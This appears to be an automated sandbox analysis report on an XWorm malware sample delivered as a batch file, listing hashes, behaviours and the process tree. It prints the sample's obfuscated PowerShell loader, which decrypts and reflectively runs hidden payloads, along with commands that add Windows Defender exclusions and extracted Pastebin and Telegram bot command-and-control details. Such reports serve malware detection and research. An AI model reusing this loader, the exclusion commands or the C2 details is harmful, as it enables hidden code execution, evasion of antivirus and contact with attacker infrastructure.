Analysis
-
max time kernel
8s -
max time network
9s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2024 19:26
Static task
static1
General
-
Target
rootkited.bat
-
Size
440KB
-
MD5
e484f05f1d6bb25017695938f8f9d1dc
-
SHA1
31b317dbf41bea5ef0e1338ba1dfedb019c4a606
-
SHA256
bad67dd9454a5d74dd958eda8ac49c6682d798d3182aeeb1ee198ce3e66f5109
-
SHA512
27375f90ca85c1a1393a1bfa243abdce413bca3a4cfde9ef80a890c93ed0b16f79ce1111671ba2a6fb6f12e5c1dfe6f0c026bc1ced01c24f7a106eaaaecd6984
-
SSDEEP
12288:Vq1Mvj0LPw0oYCy1Jx5oZamp0RHHwJOtx:VljsI0dC68Za80BQEx
Malware Config
Extracted
xworm
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/54jZmcfW
-
telegram
https://api.telegram.org/bot7470467235:AAH5xKlgIYdawUGRmIROyBj64e_oY5ROaic/sendMessage?chat_id=1330099235
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4844-17-0x000002467EA10000-0x000002467EA28000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 19 4844 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4844 powershell.exe 3412 powershell.exe 4332 powershell.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\V: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 pastebin.com 19 pastebin.com -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2212 PING.EXE -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133754811790514512" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133754811859587745" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2212 PING.EXE -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 3412 powershell.exe 3412 powershell.exe 3412 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4332 powershell.exe 4332 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3320 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4844 powershell.exe Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2396 svchost.exe Token: SeIncreaseQuotaPrivilege 2396 svchost.exe Token: SeSecurityPrivilege 2396 svchost.exe Token: SeTakeOwnershipPrivilege 2396 svchost.exe Token: SeLoadDriverPrivilege 2396 svchost.exe Token: SeBackupPrivilege 2396 svchost.exe Token: SeRestorePrivilege 2396 svchost.exe Token: SeShutdownPrivilege 2396 svchost.exe Token: SeSystemEnvironmentPrivilege 2396 svchost.exe Token: SeManageVolumePrivilege 2396 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2396 svchost.exe Token: SeIncreaseQuotaPrivilege 2396 svchost.exe Token: SeSecurityPrivilege 2396 svchost.exe Token: SeTakeOwnershipPrivilege 2396 svchost.exe Token: SeLoadDriverPrivilege 2396 svchost.exe Token: SeSystemtimePrivilege 2396 svchost.exe Token: SeBackupPrivilege 2396 svchost.exe Token: SeRestorePrivilege 2396 svchost.exe Token: SeShutdownPrivilege 2396 svchost.exe Token: SeSystemEnvironmentPrivilege 2396 svchost.exe Token: SeUndockPrivilege 2396 svchost.exe Token: SeManageVolumePrivilege 2396 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2396 svchost.exe Token: SeIncreaseQuotaPrivilege 2396 svchost.exe Token: SeSecurityPrivilege 2396 svchost.exe Token: SeTakeOwnershipPrivilege 2396 svchost.exe Token: SeLoadDriverPrivilege 2396 svchost.exe Token: SeSystemtimePrivilege 2396 svchost.exe Token: SeBackupPrivilege 2396 svchost.exe Token: SeRestorePrivilege 2396 svchost.exe Token: SeShutdownPrivilege 2396 svchost.exe Token: SeSystemEnvironmentPrivilege 2396 svchost.exe Token: SeUndockPrivilege 2396 svchost.exe Token: SeManageVolumePrivilege 2396 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2396 svchost.exe Token: SeIncreaseQuotaPrivilege 2396 svchost.exe Token: SeSecurityPrivilege 2396 svchost.exe Token: SeTakeOwnershipPrivilege 2396 svchost.exe Token: SeLoadDriverPrivilege 2396 svchost.exe Token: SeSystemtimePrivilege 2396 svchost.exe Token: SeBackupPrivilege 2396 svchost.exe Token: SeRestorePrivilege 2396 svchost.exe Token: SeShutdownPrivilege 2396 svchost.exe Token: SeSystemEnvironmentPrivilege 2396 svchost.exe Token: SeUndockPrivilege 2396 svchost.exe Token: SeManageVolumePrivilege 2396 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2396 svchost.exe Token: SeIncreaseQuotaPrivilege 2396 svchost.exe Token: SeSecurityPrivilege 2396 svchost.exe Token: SeTakeOwnershipPrivilege 2396 svchost.exe Token: SeLoadDriverPrivilege 2396 svchost.exe Token: SeSystemtimePrivilege 2396 svchost.exe Token: SeBackupPrivilege 2396 svchost.exe Token: SeRestorePrivilege 2396 svchost.exe Token: SeShutdownPrivilege 2396 svchost.exe Token: SeSystemEnvironmentPrivilege 2396 svchost.exe Token: SeUndockPrivilege 2396 svchost.exe Token: SeManageVolumePrivilege 2396 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2396 svchost.exe Token: SeIncreaseQuotaPrivilege 2396 svchost.exe Token: SeSecurityPrivilege 2396 svchost.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 208 wrote to memory of 2212 208 cmd.exe 84 PID 208 wrote to memory of 2212 208 cmd.exe 84 PID 208 wrote to memory of 4532 208 cmd.exe 89 PID 208 wrote to memory of 4532 208 cmd.exe 89 PID 208 wrote to memory of 4844 208 cmd.exe 90 PID 208 wrote to memory of 4844 208 cmd.exe 90 PID 4844 wrote to memory of 3320 4844 powershell.exe 55 PID 4844 wrote to memory of 1376 4844 powershell.exe 24 PID 4844 wrote to memory of 1572 4844 powershell.exe 28 PID 4844 wrote to memory of 1768 4844 powershell.exe 32 PID 4844 wrote to memory of 1560 4844 powershell.exe 27 PID 4844 wrote to memory of 3328 4844 powershell.exe 56 PID 4844 wrote to memory of 952 4844 powershell.exe 12 PID 4844 wrote to memory of 2132 4844 powershell.exe 38 PID 4844 wrote to memory of 1736 4844 powershell.exe 31 PID 4844 wrote to memory of 432 4844 powershell.exe 14 PID 4844 wrote to memory of 3496 4844 powershell.exe 57 PID 4844 wrote to memory of 736 4844 powershell.exe 15 PID 4844 wrote to memory of 1916 4844 powershell.exe 35 PID 4844 wrote to memory of 3516 4844 powershell.exe 68 PID 4844 wrote to memory of 1312 4844 powershell.exe 23 PID 4844 wrote to memory of 1304 4844 powershell.exe 22 PID 4844 wrote to memory of 912 4844 powershell.exe 11 PID 4844 wrote to memory of 2476 4844 powershell.exe 44 PID 4844 wrote to memory of 1096 4844 powershell.exe 19 PID 4844 wrote to memory of 2668 4844 powershell.exe 71 PID 4844 wrote to memory of 1072 4844 powershell.exe 53 PID 4844 wrote to memory of 1856 4844 powershell.exe 34 PID 4844 wrote to memory of 1688 4844 powershell.exe 30 PID 4844 wrote to memory of 2640 4844 powershell.exe 49 PID 4844 wrote to memory of 668 4844 powershell.exe 74 PID 4844 wrote to memory of 1848 4844 powershell.exe 33 PID 4844 wrote to memory of 4408 4844 powershell.exe 72 PID 4844 wrote to memory of 1052 4844 powershell.exe 18 PID 4844 wrote to memory of 1640 4844 powershell.exe 29 PID 4844 wrote to memory of 4396 4844 powershell.exe 67 PID 4844 wrote to memory of 2620 4844 powershell.exe 48 PID 4844 wrote to memory of 2420 4844 powershell.exe 43 PID 4844 wrote to memory of 1040 4844 powershell.exe 17 PID 4844 wrote to memory of 792 4844 powershell.exe 8 PID 4844 wrote to memory of 2612 4844 powershell.exe 47 PID 4844 wrote to memory of 1408 4844 powershell.exe 25 PID 4844 wrote to memory of 2412 4844 powershell.exe 42 PID 4844 wrote to memory of 1028 4844 powershell.exe 16 PID 4844 wrote to memory of 1420 4844 powershell.exe 26 PID 4844 wrote to memory of 2008 4844 powershell.exe 36 PID 4844 wrote to memory of 2792 4844 powershell.exe 50 PID 4844 wrote to memory of 2396 4844 powershell.exe 41 PID 4844 wrote to memory of 4956 4844 powershell.exe 65 PID 4844 wrote to memory of 1232 4844 powershell.exe 21 PID 4844 wrote to memory of 2180 4844 powershell.exe 40 PID 4844 wrote to memory of 1188 4844 powershell.exe 20 PID 4844 wrote to memory of 2168 4844 powershell.exe 39 PID 792 wrote to memory of 3512 792 svchost.exe 94 PID 792 wrote to memory of 3512 792 svchost.exe 94 PID 4844 wrote to memory of 1876 4844 powershell.exe 93 PID 4844 wrote to memory of 3412 4844 powershell.exe 95 PID 4844 wrote to memory of 3412 4844 powershell.exe 95 PID 4844 wrote to memory of 4332 4844 powershell.exe 97 PID 4844 wrote to memory of 4332 4844 powershell.exe 97
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:3512
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1376
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:1072
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rootkited.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\system32\PING.EXEping -n 1 www.google.com3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ASRknCxDp4etiheySKX7HoUO7MX75S2TThgxNrvf9P0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9bGkVyIyvagVZMKH9eqKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $esZHU=New-Object System.IO.MemoryStream(,$param_var); $CyIHI=New-Object System.IO.MemoryStream; $xHhsl=New-Object System.IO.Compression.GZipStream($esZHU, [IO.Compression.CompressionMode]::Decompress); $xHhsl.CopyTo($CyIHI); $xHhsl.Dispose(); $esZHU.Dispose(); $CyIHI.Dispose(); $CyIHI.ToArray();}function execute_function($param_var,$param2_var){ $hfvNe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DgevX=$hfvNe.EntryPoint; $DgevX.Invoke($null, $param2_var);}$DpIzr = 'C:\Users\Admin\AppData\Local\Temp\rootkited.bat';$host.UI.RawUI.WindowTitle = $DpIzr;$aQJNz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DpIzr).Split([Environment]::NewLine);foreach ($kaoWt in $aQJNz) { if ($kaoWt.StartsWith('AHYjqkIktYisQQfJMFol')) { $nnXUv=$kaoWt.Substring(20); break; }}$payloads_var=[string[]]$nnXUv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4332
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3496
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:3516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:1876
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82